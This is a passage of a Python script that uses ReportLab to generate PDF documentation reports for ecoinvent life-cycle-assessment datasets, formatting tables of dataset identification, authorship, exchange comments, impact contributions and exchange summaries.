\n ('ALIGN',(0,0),(0,-1),'RIGHT'),\n ('ALIGN',(1,1),(1,-1),'LEFT'),\n ('INNERGRID', (0,0), (-1,-1), thin_line, colors.white), \n (('LINEBELOW', (1,0), (-1,-2), .25, colors.black))\n ])\nh_header = deepcopy(all_table_style)\nh_header.extend([\n ('BACKGROUND',(0,0),(-1,0), colors.lightgrey), \n ('ALIGN',(0,0),(-1,0),'CENTRE'),\n ('INNERGRID', (0,0), (-1,0), thin_line, colors.white),\n ('TOPPADDING', (0,0), (-1,-1), 1),\n ('BOTTOMPADDING', (0,0), (-1,-1), 1),\n ('LINEABOVE', (0,1), (-1,1), .25, colors.white)\n ])\nh_header2 = [('SPAN',(0,0),(-1,0)), #merge the first line for the header inner table\n ('LEFTPADDING', (0,0), (-1,0), 0), #remove padding for the inner table to be seemless\n ('RIGHTPADDING', (0,0), (-1,-1), 0), \n ('TOPPADDING', (0,0), (-1,-1), 1),\n ('BOTTOMPADDING', (0,0), (-1,-1), 1),\n ('VALIGN',(0,0),(-1,-1),'MIDDLE'), #valign middle for all\n ('INNERGRID', (0,1), (-1,-1),thin_line, colors.black), #grid after the header\n ('TEXTCOLOR',(0,0),(0,-1), colors.black), #black text for all\n ]\ntable_header_style = [('SPAN',(0,0),(-1,0)), \n ('INNERGRID', (0,0), (-1,-1), thin_line, colors.black),\n ('BACKGROUND',(0,1),(-1,1), colors.lightgrey), \n ('VALIGN',(0,0),(-1,-1),'MIDDLE'),\n ('TEXTCOLOR',(0,0),(0,-1), colors.black), \n ('LEFTPADDING', (0,0), (0,0), 0), \n ('INNERGRID', (0,0), (-1,-1), thin_line, colors.white),\n ('TOPPADDING', (0,0), (-1,-1), 1),\n ('BOTTOMPADDING', (0,1), (-1,1), 0),\n ]\ninner_table_style = [('INNERGRID', (0,0), (-1,0), thin_line, colors.black), \n ('VALIGN',(0,0),(-1,-1),'MIDDLE'), \n ('RIGHTPADDING', (0,0), (-1,-1), 0), \n ('BOTTOMPADDING', (0,1), (-1,-1), 0), \n 
('BOTTOMPADDING', (0,0), (-1,0), 3), \n ('TOPPADDING', (0,0), (-1,-1), 1),\n ('SPAN',(0,1),(-1,1))\n ]\nlogo_path = os.path.join(utils.db_basepath, 'common files', 'ecoinvent_logo_2015_small-01.jpg')\ntechnologyLevels = {None: 'Undefined', \n '0': 'Undefined', \n '1': 'New', \n '2': 'Modern', \n '3': 'Current', \n '4': 'Old', \n '5': 'Outdated'\n }\nspecialActivityTypes = {\n '0': 'ordinary transforming activity', \n '1': 'market activity', \n '2': 'IO activity', \n '3': 'Residual activity', \n '4': 'production mix', \n '5': 'import activity', \n '6': 'supply mix', \n '7': 'export activity', \n '8': 're-export activity', \n '9': 'correction activity', \n '10': 'market group'\n }\nAccessRestrictedTos = {\n '0': 'Public', \n '1': 'Licensee', \n '2': 'Results', \n '3': 'Restricted', \n None: ''\n }\ncompartments = {'air': ['urban air close to ground', 'indoor', \n 'low population density, long-term', \n 'unspecified', 'non-urban air or from high stacks', \n 'lower stratosphere + upper troposphere'], \n 'soil': ['forestry', 'unspecified', 'agricultural', 'industrial'], \n 'water': ['ground-, long-term', 'ground-', 'unspecified', 'ocean', 'surface water'], \n 'natural resource': ['in air', 'land', 'biotic', 'in ground', 'in water'], \n 'direct human uptake': ['unspecified'], \n 'social': ['unspecified'], \n 'economic': ['primary production factor']}\npedigree_re = re.compile('[,;]?\\s?\\(\\w*(,\\w*){3,6}\\),?\\s*[,;]?\\s?')\namount_width = 1.2*inch\nsubcompartment_width = 1.3*inch\nprod_vol_width = 1.2*inch\ncontrib_width = .7*inch\nconfidential = Paragraph('This dataset contains some confidential information. All details of the unit process data are therefore not available. Confidential datasets are rarely included in the ecoinvent database and are the result of special circumstances. However, information on products, the dataset documentation and the impact assessment results are available via the ecoinvent website. For more information on confidential datasets, please see the FAQ page on this topic.' % ecoinvent_red, large_table_style)\nclass MyDocTemplate(BaseDocTemplate):\n def __init__(self, filename, **kw):\n self.allowSplitting = 0\n BaseDocTemplate.__init__(self, filename, **kw)\n template1 = PageTemplate('normal', [Frame(MARGIN, MARGIN, PAGE_WIDTH-MARGIN*2., \n PAGE_HEIGHT-MARGIN*3., showBoundary = False)])\n template2 = PageTemplate('normal', [Frame(MARGIN, MARGIN, PAGE_WIDTH-MARGIN*2., \n PAGE_HEIGHT-MARGIN*3., showBoundary = False)]) #, id='F1'\n self.addPageTemplates(template1)\n self.addPageTemplates(template2)\ndef text_corrections(s):\n if len(s) > 0:\n if s[0] == '[' and s[-1] == ']':\n s = s[1:-1]\n s = s.strip()\n if len(s) > 0:\n for previous, new in [('( ', '('), ('.).', '.)'), (' %', '%'), \n ('\\'', '\"'), ('-\\\\t', '- '), ('..', '.'), ('overtaken', 'taken'), (' :', ':'), \n ('\\n', ''), ('\"\"', '\"'), ('. . ', '. '), (').)', ')'), ('version two', 'version 2'), \n ('. .', '.'), ('IEA 212', 'IEA 2012'), ('of the of', 'of the'), \n (' )', ')'), (' )', ')'), ('; .', '; '), \n ('NEED TO BE RELINKED ONCE CEMENT PRODUCTION IS IMPLEMENTED IN ECOINVENT V.3', '')]:\n s = s.replace(previous, new)\n if '\"text\", \"' == s[:9]:\n s = s.replace('\"text\", \"', '')\n if s[-2:] == '\".':\n s = s[:-2]\n if s[:5] == 'none ':\n s = s[5:]\n for previous, new in [('i. e', 'i.e'), ('n. a', 'n.a'), ('. 
;', '.;')]:\n s = s.replace(previous, new)\n s = s[0].capitalize() + s[1:]\n if 'ecoinvent version 3 change report' in s:\n to_remove = 'ecoinvent version 3 change report (http://www.ecoinvent.org/database/ecoinvent-version-3/reports-of-changes/)'\n to_add = 'ecoinvent version 3 change report' % ecoinvent_red\n s = s.replace(to_remove, to_add)\n if s[-1] not in ['.', ';', ':']:\n s += '.'\n return s\ndef compartment_header(compartment):\n if compartment in ['natural resource', 'natural resources']:\n tag = 'Inputs from environment'\n else:\n tag = 'Emissions to %s' % compartment\n return tag\ndef product_classifications(ao, sel):\n sel = ao[ao['Product'] == sel['name']].iloc[0]\n if sel['mft'] == 'not mft':\n mft = 'no'\n else:\n mft = 'yes'\n bpc = sel['By-product classification']\n return mft, bpc\ndef find_exc(s, f):\n if 'Environment' in s['group']:\n exc = f.find_exchanges({'name': s['name'], \n 'compartment': s['compartment'], \n 'subcompartment': s['subcompartment']})[0]\n elif s['group'] == 'FromEnvironment':\n exc = f.find_exchanges({'group': s['group'], \n 'name': s['name']})[0]\n else:\n to_search = {'group': s['group'], 'name': s['name'], \n 'activityLinkId': s['activityLinkId']}\n if str(to_search['activityLinkId']) in ['None', 'nan', 'NaN', 'NAN', '']:\n to_search['activityLinkId'] = None\n exc = f.find_exchanges(to_search)[0]\n return exc\ndef find_activityLink(exc):\n sel = ao.loc[exc.activityLinkId]\n if type(sel) != pandas.core.series.Series:\n sel = sel.iloc[0]\n return sel['activityName'], sel['geography']\ndef arrange_comments(f, s, ao, logs, AL = True):\n to_write = []\n length_to_write = 0\n exc = find_exc(s, f)\n comments = []\n for c in exc.comment: #eliminate duplicate comments\n for cc in c.split('\\n'):\n if cc not in comments and len(cc) > 1:\n comments.append(cc)\n exc.comment = deepcopy(comments)\n if f.specialActivityType == '1' and s['unitName'] == 'metric ton*km':\n ref_exc = f.get_reference_product()\n if 'wet mass' in ref_exc.properties_dict:\n wm = ref_exc.properties_dict['wet mass'][0]\n if wm != 0.:\n km = s['amount']/wm*1000.\n p = 'This corresponds to the transport of %s %s of the reference product for %s km.' 
% (\n abs(ref_exc.amount), ref_exc.unitName, utils.arrange_float(km, switch_sci = 6))\n length_to_write += len(p)\n to_write.append(Paragraph(p, header_style))\n if exc.activityLinkId != None and AL:\n if exc.activityLinkId in ao.index:\n name, geo = find_activityLink(exc)\n p = 'Activity link: %s - %s' % (name, geo)\n else:\n p = 'Activity link: Info not yet in masterdata'\n to_write.append(Paragraph(p, header_style))\n length_to_write += len(p)\n comment = []\n if exc.comment != None:\n for i in range(len(exc.comment)):\n if exc.comment[i][-3:] == 'nan':\n exc.comment[i] = exc.comment[i][:-3]\n exc.comment[i] = exc.comment[i].strip()\n if len(exc.comment[i]) > 0:\n if exc.comment[i][-1] not in ['.', ';', ':']:\n exc.comment[i] += '.'\n comment.append(exc.comment[i])\n comment = ' '.join(comment)\n if len(comment) != 0:\n to_write.append(Paragraph('Comment: ' + utils.killgremlins(comment), header_style))\n length_to_write += len('Comment: ' + comment)\n if hasattr(exc, 'productionVolumeComment') and not utils.is_empty(exc.productionVolumeComment):\n to_write.append(Paragraph('Production volume comment: ' + exc.productionVolumeComment, header_style))\n length_to_write += len('Production volume comment: ' + exc.productionVolumeComment)\n if exc.group != 'ReferenceProduct' and not utils.is_empty(exc.uncertainty):\n text = 'Uncertainty distribution: ' + exc.uncertainty.type\n if exc.uncertainty.type == 'lognormal':\n text += '; GSD2: %s; Pedigree matrix: %s' % (\n utils.arrange_float(np.exp(np.sqrt(exc.uncertainty.varianceWithPedigreeUncertainty)), \n significative_digits = 3, switch_sci = 6), \n exc.uncertainty.pedigreeMatrix)\n to_write.append(Paragraph(text, header_style))\n if not utils.is_empty(exc.uncertainty.get('comment')):\n for i in range(len(exc.uncertainty.get('comment'))):\n if exc.uncertainty.comment[i][-3:] == 'nan':\n exc.uncertainty.comment[i] = exc.uncertainty.get('comment')[i][:-3]\n exc.uncertainty.comment[i] = exc.uncertainty.get('comment')[i].strip()\n for comment in exc.uncertainty.get('comment'):\n to_write.append(Paragraph('Uncertainty comment: ' + comment, small_table_style))\n length_to_write += len('Uncertainty comment: ' + comment)\n if exc.sourceFirstAuthor != None:\n p = 'Source: ' + exc.sourceFirstAuthor\n if exc.sourceYear != None:\n p += ' ' + exc.sourceYear\n length_to_write += len('Source: ' + p)\n to_write.append(Paragraph(p, header_style))\n ref = f.get_reference_product()\n if (f.specialActivityType in [1, 10] and \n f.get('modellingAndValidation').get('systemModelName') != 'Undefined' and \n ref.name == exc.name and \n exc.activityLinkId != f.id and\n exc.group == 'FromTechnosphere'):\n sel = ao.loc[exc.activityLinkId]\n if type(sel) != pandas.core.frame.DataFrame:\n sel = DataFrame(sel).transpose()\n try:\n sel = sel[sel['name'] == exc.name]\n except:\n 1/0\n if len(sel) > 0:\n sel = sel.iloc[0]\n p = 'Annual production volume of supplying activity: %s %s' % (\n utils.arrange_float(sel['productionVolumeAmount'], switch_sci = 4), \n exc.unitName)\n if not utils.is_empty(sel['productionVolumeAmount']):\n p += '; ' + str(sel['productionVolumeAmount'])\n to_write.append(Paragraph(p, header_style))\n if length_to_write > max_comment_length:\n to_write = [Paragraph('The comment entered by the data provider is too long to be displayed. 
Please refer to ecoQuery or ecoEditor for more details.', header_style)]\n    if len(to_write) == 0:\n        to_write.append(Paragraph('Comment: None.', header_style))\n    return to_write, logs, length_to_write\ndef get_relative_contributions(f, s, A):\n    cut_off = .1 #in percent\n    total_scores = find_total_score(f)\n    exc = find_exc(s, f)\n    if exc.activityLinkId == None and 'Environment' not in exc.group:\n        rel_contrib = ['0']*len(total_scores)\n    else:\n        rel_contrib = []\n        if 'Environment' in exc.group:\n            ee_name = (exc.name, exc.compartment, exc.subcompartment)\n            if ee_name in indexes.ee:\n                for i in range(len(total_scores)):\n                    CF = C[indexes.toggle['LCIA'][indicators_for_contrib[i]],indexes.toggle['ee'][ee_name]]\n                    if total_scores[i] == 0.: #test before dividing by the total score\n                        r = '0'\n                    else:\n                        r = exc.amount * CF / total_scores[i]*100.\n                        if abs(r) < cut_off:\n                            r = '<' + str(cut_off).replace('.0', '')\n                        elif r > 100.-cut_off:\n                            r = '100' #the '%' sign is appended later, in amount_cell\n                        else:\n                            r = utils.arrange_float(r, significative_digits = 2, switch_sci = 6)\n                            if r[-2:] == '.0':\n                                r = r[:-2]\n                    rel_contrib.append(r)\n        else:\n            name, geo = find_activityLink(exc)\n            ie = (name, geo, exc.name)\n            if ie in indexes.ie:\n                scores = utils.pkl_load(scores_path, str(indexes.toggle['ie'][ie]))\n                for i in range(len(total_scores)):\n                    LCIA = indicators_for_contrib[i]\n                    try:\n                        score = scores[indexes.toggle['LCIA'][LCIA],0]\n                    except IndexError:\n                        score = scores[0,indexes.toggle['LCIA'][LCIA]]\n                    x = indexes.toggle['ie'][ie]\n                    if total_scores[i] == 0.:\n                        r = '0'\n                    else:\n                        r = score / total_scores[i] * exc.amount*100. * A[x, x]\n                        if abs(r) < cut_off:\n                            r = '<' + str(cut_off).replace('.0', '')\n                        elif r > 100.-cut_off:\n                            r = '100'\n                        else:\n                            r = utils.arrange_float(r, significative_digits = 2, switch_sci = 6)\n                            if r[-2:] == '.0':\n                                r = r[:-2]\n                    rel_contrib.append(r)\n    return rel_contrib\ndef dataset_id(f, Story, ao, logs, serialization_mapping, system_model):\n    if f.id in ao.index:\n        ao_f = ao.loc[f.id].iloc[0]\n    else:\n        ao_f = None\n    \n    #header\n    table_content = [[Paragraph('Dataset identification', title_style), '', \n                      Paragraph('Table of content', title_style)]]\n    \n    #activity name\n    table_content.append(\n        [Paragraph('Activity name', header_style), Paragraph(f.activityName, large_table_style)])\n    \n    #geography\n    longname = MD['Geographies'].loc[f.geography]['name']\n    if ' (' in longname:\n        longname = 'China - ' + longname.split(' (')[0] #Chinese provinces have a character in parentheses that does not render well\n    g = '%s (%s)' % (f.geography, longname)\n    g = g.replace(' (Europe without Switzerland)', '')\n    table_content.append([Paragraph('Geography', header_style), \n                          Paragraph(g, large_table_style)])\n    \n    #time period\n    to_write = f.get('startDate') + ' to ' + f.get('endDate') + '. 
'\n if hasattr(f, 'isDataValidForEntirePeriod'):\n if f.isDataValidForEntirePeriod == 'true':\n to_write += 'Valid for the entire period'\n else:\n to_write += 'Not valid for all period'\n table_content.append([Paragraph('Time period', header_style), Paragraph(to_write, large_table_style)])\n \n #synonyms\n if not utils.is_empty(f.get('synonym')):\n up_to = 3\n if len(f.synonym) == 1:\n table_content.append([Paragraph('Synonym(s)', header_style), Paragraph(f.synonym[0], large_table_style)])\n else:\n if len(f.synonym) > up_to:\n to_write = {0:{'system model': f.get('modellingAndValidation').get('systemModelName'), \n 'activityName': f.activityName, \n 'geography': f.geography, \n 'filename': f.filename, \n 'problem type': 'too many synonyms', \n 'details': 'only the first %s were written' % up_to}}\n #logs = concat([logs, DataFrame(to_write).transpose()])\n else:\n up_to = len(f.synonym)\n to_write = [Paragraph(f.synonym[0], large_table_style)]\n for i in range(1, up_to):\n to_write.append(Paragraph(f.synonym[i], large_table_style))\n table_content.append([Paragraph('Synonyms', header_style), to_write])\n else:\n table_content.append([Paragraph('Synonym', header_style), Paragraph('None', large_table_style)])\n \n #ISIC classification\n if not utils.is_empty(f.get('classifications')):\n for c in f.classifications:\n if c.classificationSystem == 'ISIC rev.4 ecoinvent':\n c = c.classificationValue.split(':')\n for i in range(len(c)):\n c[i] = c[i].strip()\n c = '%s: %s' % tuple(c)\n table_content.append([Paragraph('ISIC 4 classification', header_style), \n Paragraph(c, large_table_style)])\n break\n else:\n table_content.append([Paragraph('Classification', header_style), ''])\n \n #reference product\n ref = f.get_reference_product()\n table_content.append([Paragraph('Reference product', header_style), \n Paragraph(ref.name, large_table_style)])\n \n #CPC classification\n for c in ref.get('classifications'):\n if c.classificationSystem == 'CPC':\n table_content.append([Paragraph('CPC classification', header_style), \n Paragraph(c.classificationValue, large_table_style)])\n break\n \n #special activity type\n to_write = [Paragraph(spold2.meta_translator['specialActivityType'][f.get('specialActivityType')].capitalize(), large_table_style)]\n if type(ao_f) == pandas.core.series.Series and f.specialActivityType == 'market activity':\n if ao_f['constrained market'] == 'no':\n to_write.append(Paragraph('unconstrained market', large_table_style))\n else:\n to_write.append(Paragraph('constrained market', large_table_style))\n table_content.append([Paragraph('Dataset type', header_style), to_write])\n \n #Technology level\n table_content.append([Paragraph('Technology level', header_style), spold2.meta_translator['technologyLevel'][f.get('technologyLevel')]])\n \n #version\n if '2016-' in version:\n v = '3.3'\n else:\n v = version\n table_content.append([Paragraph('Version - system model', header_style), \n Paragraph('%s - %s' % (v, system_model), large_table_style)])\n \n #Table of content\n for i in range(1, len(table_content)):\n table_content[i].append('')\n table_style = deepcopy(v_header)\n table_style[0] = ('VALIGN', (0, 0), (-2, -1), 'MIDDLE')\n table_style[3] = ('BACKGROUND', (0, 1), (0, -1), colors.lightgrey)\n table_style.append(('SPAN',(0,0),(1,0)))\n table_style.append(('SPAN',(2,1),(2,-1)))\n table_style.append(('INNERGRID', (2, 0), (2, -1), 0.25, colors.white))\n table_style.append(('VALIGN', (-1, 0), (-1, -1), 'TOP'))\n inner_table = [[table_of_content(f)]]\n \n #Note\n if 
f.get('modellingAndValidation').get('systemModelName') == 'Undefined':\n        p = Paragraph('Note: This document contains only an extract of the information in the dataset. Additional data about properties of exchanges, mathematical relations, parameters, and contact information for authors and reviewers are available in the full dataset, e.g. through the ecoinvent website. \nAmount and identity of the exchanges in an undefined dataset are independent of the modeling choices made by the different system models. Linked datasets are available in separate documents. ', small_justified)\n    else:\n        p = Paragraph('Note: This document contains only an extract of the information in the dataset. Additional data about properties of exchanges, mathematical relations, parameters, and contact information for authors and reviewers are available in the full dataset, e.g. through the ecoinvent website. ', small_justified)\n    inner_table.append([p])\n    \n    #Link to ecoQuery\n    if type(serialization_mapping) == str:\n        link = ''\n    else:\n        link = link_to_ecoQuery(serialization_mapping, f, system_model)\n    inner_table.append([Paragraph('<a href="%s"><font color="%s">Link to the dataset on the ecoinvent website</font></a>' % (\n        link, ecoinvent_red), header_style)])\n    table_content[1][2] = Table(inner_table)\n    t = Table(table_content, colWidths = [1.2*inch, 3.2*inch, 2.8*inch])\n    t.setStyle(TableStyle(table_style))\n    Story.append(t)\n    Story.append(Spacer(1, inter_par_dist))\n    return Story, logs\ndef table_of_content(f):\n    #entries of the table of content, rendered in ecoinvent red\n    table_content = []\n    table_content.append([Paragraph('<font color="%s">Exchange summary</font>' % ecoinvent_red, large_table_style)])\n    table_content.append([Paragraph('<font color="%s">Dataset description</font>' % ecoinvent_red, large_table_style)])\n    try:\n        if f.dataGeneratorAndPublication.accessRestrictedTo in [0, 1]:\n            table_content.append([Paragraph('<font color="%s">Detailed information for exchanges</font>' % ecoinvent_red, large_table_style)])\n    except:\n        pass\n    if f.get('modellingAndValidation').get('systemModelName') != 'Undefined':\n        table_content.append([Paragraph('<font color="%s">Selected impact assessment results</font>' % ecoinvent_red, large_table_style)])\n    table_content.append([Paragraph('<font color="%s">Sources</font>' % ecoinvent_red, large_table_style)])\n    table_style = [('LEFTPADDING', (0,0), (-1,-1), 0)]\n    t = Table(table_content)\n    t.setStyle(TableStyle(table_style))\n    return t\ndef dataset_authorship(f, Story, MD):\n    to_remove = [', NOENTRY']\n    colWidths = [1.1*inch, .9*inch, 5.*inch]\n    header = [['']*len(colWidths)]\n    header[0][0] = Paragraph('Dataset authorship', title_style)\n    header.append([Paragraph('Role', large_table_style), Paragraph('Date', large_table_style), \n                   Paragraph('Name, organisation', large_table_style)])\n    header = Table(header, colWidths = colWidths)\n    header.setStyle(TableStyle(table_header_style))\n    table_content = [['']*len(colWidths)]\n    table_content[0][0] = header\n    try:\n        name = f.personName\n    except AttributeError:\n        name = '[System]'\n    if hasattr(f, 'personId') and f.personId in set(MD['persons'].index):\n        sel = MD['persons'].loc[f.personId]\n        if type(sel['companyId']) == str:\n            name += ', ' + MD['Companies'].loc[sel['companyId']]['name']\n        for t in to_remove:\n            name = name.replace(t, '')\n        name = [Paragraph(name, large_table_style)]\n        if hasattr(f, 'isActiveAuthor') and f.isActiveAuthor == 'true':\n            name.append(Paragraph('active author', large_table_style))\n        table_content.append([Paragraph('Data generator', large_table_style), \n                              f.creationTimestamp.split('T')[0], name])\n        name = f.dataGeneratorAndPublication.personName\n    else:\n        #new name not yet in the master data\n        name = '[System]'\n    
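#Data entry row: the data-entry person is looked up in the master data to append the organisation; reviews are then sorted by date, de-duplicated by reviewer name, and only the three most recent ones are printed\n    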
if name != '[System]':\n        try:\n            sel = MD['persons'].loc[f.dataGeneratorAndPublication.personId]\n            #the organisation is appended only when the person is found in the master data\n            if type(sel['companyId']) == str:\n                company = MD['Companies'].loc[sel['companyId']]['name']\n                if company != 'NOENTRY':\n                    name += ', ' + company\n        except:\n            pass\n        for t in to_remove:\n            name = name.replace(t, '')\n    table_content.append([Paragraph('Data entry', large_table_style), f.creationTimestamp.split('T')[0], \n                          Paragraph(name, large_table_style)])\n    reviews = []\n    for r in f.get('modellingAndValidation').get('reviews'):\n        if not utils.is_empty(r.reviewDate):\n            name = r.reviewerName\n            if name != '[System]':\n                sel = MD['Persons'].loc[r.get('reviewerId')]\n                if type(sel['companyId']) == str:\n                    name += ', ' + MD['Companies'].loc[sel['companyId']]['name']\n                for t in to_remove:\n                    name = name.replace(t, '')\n                to_add = {'name': name, \n                          'date': r.reviewDate, \n                          'contact': sel['email']}\n                reviews.append(to_add)\n    if len(reviews) != 0:\n        reviews = utils.list_to_df(reviews)\n        reviews = reviews.sort('date').drop_duplicates('name', take_last = True)\n        max_reviews = 3\n        if len(reviews) > max_reviews:\n            reviews = reviews.iloc[-max_reviews:]\n        for i in range(len(reviews)):\n            table_content.append([Paragraph('Review', large_table_style), \n                                  Paragraph(reviews.iloc[i]['date'], large_table_style), \n                                  Paragraph(reviews.iloc[i]['name'], large_table_style)])\n    t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n    t.setStyle(TableStyle(h_header2))\n    Story.append(t)\n    Story.append(Spacer(1, inter_par_dist))\n    return Story\ndef TTextAndImage_print(f, Story, tag, field, logs, market_comments, \n                        image_counter, image_report):\n    write = False\n    if field == 'generalComment':\n        write = True\n    elif f.get(field) != None and len(f.get(field).comments) != 0:\n        write = True\n    if write:\n        Story.append(Paragraph('%s' % tag, justified))\n        Story[-1].keepWithNext = True\n        Story.append(Spacer(1, small_spacer))\n        Story[-1].keepWithNext = True\n        something = False\n        if field == 'generalComment' and f.specialActivityType in ['1']:\n            sel = market_comments.loc[(f.specialActivityType, field), 'text']\n            for c in sel.split('\n'):\n                Story.append(Paragraph(c, no_info_style))\n                Story.append(Spacer(1, small_spacer))\n            something = True\n        if f.get(field) != None and len(f.get(field).comments) != 0:\n            for comment_type, comment, comment_index in getattr(f, field).comments:\n                something = True\n                if comment_type == 'text':\n                    if comment not in [None, '']:\n                        if 'http' not in comment:\n                            comment = comment.split('//')\n                        else:\n                            comment = [comment]\n                        for c in comment:\n                            if len(c) > 0:\n                                c = text_corrections(c)\n                                if 'individually updated during' in c:\n                                    link = 'http://www.ecoinvent.org/support/documents-and-files/documents-and-files.html#290'\n                                    c += ' The original ecoinvent version 2 documentation can be consulted <a href="%s"><font color="%s">here</font></a>. 
' % (\n link, ecoinvent_red)\n Story.append(Paragraph(c, bullet))\n Story.append(Spacer(1, small_spacer))\n else:\n try:\n if f.activityName != 'lightweight concrete block production, expanded clay':\n I = Image(comment)\n aspect = I.imageHeight / float(I.imageWidth)\n width = min((PAGE_WIDTH-2.*MARGIN)*.8, I.imageWidth)\n I = Image(comment, width=width, height=width * aspect)\n I.hAlign = 'CENTER'\n t = Table([[I]], colWidths = [7.*inch])\n t.setStyle(TableStyle([('ALIGN',(0,0),(-1,-1),'CENTRE'),]))\n Story.append(t)\n image_counter +=1\n to_add = {'activityName': f.activityName, \n 'geography': f.geography, \n 'filename': f.filename, \n 'reference product': f.get_reference_product().name, \n 'image url': comment}\n image_report[len(image_report)] = copy(to_add)\n except IOError:\n to_write = {0:{'system model': f.get('modellingAndValidation').get('systemModelName'), \n 'activityName': f.activityName, \n 'geography': f.geography, \n 'filename': f.filename, \n 'problem type': 'image unavailable', \n 'details': comment}}\n logs = concat([logs, DataFrame(to_write).transpose()])\n if not something:\n Story.append(no_info)\n if Story[-1] != Spacer(1, small_spacer):\n Story.append(Spacer(1, small_spacer))\n return Story, logs, image_counter, image_report\ndef text_comments(f, Story, market_comments):\n Story.append(Paragraph('Included activities start', justified))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n something = False\n if f.specialActivityType in [1, 10]:\n sel = market_comments.loc[(f.specialActivityType, \n 'includedActivitiesStart'), 'text']\n for c in sel.split('\\n'):\n Story.append(Paragraph(c, no_info_style))\n something = True\n if f.get('includedActivitiesStart') != None:\n comment = text_corrections(f.includedActivitiesStart)\n Story.append(Paragraph(comment.split('- ')[0], bullet))\n something = True\n for c in comment.split('- ')[1:]:\n c = c.strip()\n c = ' - ' + c\n if len(c) > 1:\n if c[-1] not in ['.', ';', ':']:\n c += '.'\n Story.append(Paragraph(c, bullet))\n if not something:\n Story.append(no_info)\n Story.append(Spacer(1, small_spacer))\n Story.append(Paragraph('Included activities ends', justified))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n something = False\n if f.specialActivityType in ['1']: #no such comment for market groups\n sel = market_comments.loc[(f.specialActivityType, \n 'includedActivitiesEnd'), 'text']\n for c in sel.split('\\n'):\n Story.append(Paragraph(c, no_info_style))\n something = True\n if f.get('includedActivitiesEnd') != None:\n comment = text_corrections(f.includedActivitiesEnd)\n Story.append(Paragraph(comment.split('- ')[0], bullet))\n something = True\n for c in comment.split('- ')[1:]:\n c = text_corrections(c)\n c = ' - ' + c\n if len(c) > 1:\n Story.append(Paragraph(c, bullet))\n if not something:\n Story.append(no_info)\n Story.append(Spacer(1, small_spacer))\n if not utils.is_empty(f.get('modellingAndValidation').get('samplingProcedure')):\n Story.append(Paragraph('Sampling procedure', justified))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n comment = text_corrections(f.get('modellingAndValidation').get('samplingProcedure'))\n Story.append(Paragraph(comment, bullet))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n if not utils.is_empty(f.get('modellingAndValidation').get('extrapolations')):\n 
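#The extrapolations free text below is normalised by text_corrections(), which strips enclosing brackets, applies the replacement table and capitalises the first letter; e.g. text_corrections('[some note ]') returns 'Some note.'\n        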
Story.append(Paragraph('Extrapolations', justified))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n comment = text_corrections(f.get('modellingAndValidation').get('extrapolations'))\n Story.append(Paragraph(comment, bullet))\n Story.append(Spacer(1, small_spacer))\n return Story\ndef build_exchange_df(f):\n exchange_df = []\n for exc in f.get_all_exchanges():\n to_add = exc.baseline(additional_fields = ['sourceId', 'productionVolumeAmount'])\n to_add['unitName'] = to_add['unitName'].replace('metric ton*km', 'ton*km')\n if exc.get('uncertainty') != None:\n to_add.update({'distribution': exc.uncertainty.type, \n 'pedigree': exc.uncertainty.pedigreeMatrix})\n else:\n to_add['distribution'] = to_add['pedigree'] = ''\n exchange_df.append(to_add)\n exchange_df = utils.list_to_df(exchange_df)\n classifications = ao[['name', 'By-product classification', 'mft']].reset_index()\n #fix me: classification could come from current MD. Would allow classification of\n #stuff not in the DB yet. \n if 'Activity UUID' in classifications.columns:\n del classifications['Activity UUID']\n classifications = classifications.drop_duplicates(subset = ['name']).set_index('name')\n exchange_df = exchange_df.set_index('name')\n exchange_df = exchange_df.join(classifications)\n exchange_df = exchange_df.reset_index()\n if 'name' not in exchange_df:\n exchange_df = exchange_df.rename(columns = {'index': 'name'})\n exchange_df = exchange_df.sort('name')\n exchange_df.loc[exchange_df['mft'] == 'not mft', 'mft'] = 'no'\n exchange_df.loc[exchange_df['mft'] == 'mft', 'mft'] = 'yes'\n exchange_df = exchange_df.replace(to_replace = {'compartment': {np.NaN: ''}}) \n return exchange_df\ndef exchange_summary_undefined(exchange_df, Story):\n table_style = [\n ('TOPPADDING', (0,0), (-1,-1), 1),\n ('BOTTOMPADDING', (0,0), (-1,-1), 1),\n ('VALIGN',(0,0),(-1,-1),'MIDDLE'), #valign middle for all\n ('HALIGN',(0,1),(-1,0),'MIDDLE'), #valign middle for all\n ('TEXTCOLOR',(0,0),(0,-1), colors.black), #black text for all\n ('BACKGROUND',(0,0),(-1,0), colors.lightgrey), \n ('INNERGRID', (0,0), (-1,0),thin_line, colors.white), #grid after the header\n ('INNERGRID', (0,1), (-1,-1),thin_line, colors.black), #grid after the header\n ]\n groups = ['ReferenceProduct', 'ByProduct']\n if f.dataGeneratorAndPublication.accessRestrictedTo in [0, 1]:\n groups.append('FromTechnosphere')\n else:\n Story.append(confidential)\n Story.append(Spacer(1, inter_par_dist))\n stars = 1\n footnotes = []\n for group in groups:\n table_style_ = deepcopy(table_style)\n sel = exchange_df[exchange_df['group'] == group]\n if len(sel) > 0:\n if group == 'ReferenceProduct':\n s = 'Reference products'\n if sel['amount'].min() < 0.:\n s += '*'*stars\n footnotes.append(('*'*stars, 'A negative reference product amount indicates a waste treatment activity, or a market linking to treatment activities.'))\n stars += 1\n elif group == 'ByProduct':\n s = 'By-products'\n if sel['amount'].min() < 0. and f.specialActivityType == '1':\n s += '*'*stars\n footnotes.append(('*'*stars, 'Negative by-products in a market dataset indicate a constrained market, a feature of the consequential system model. 
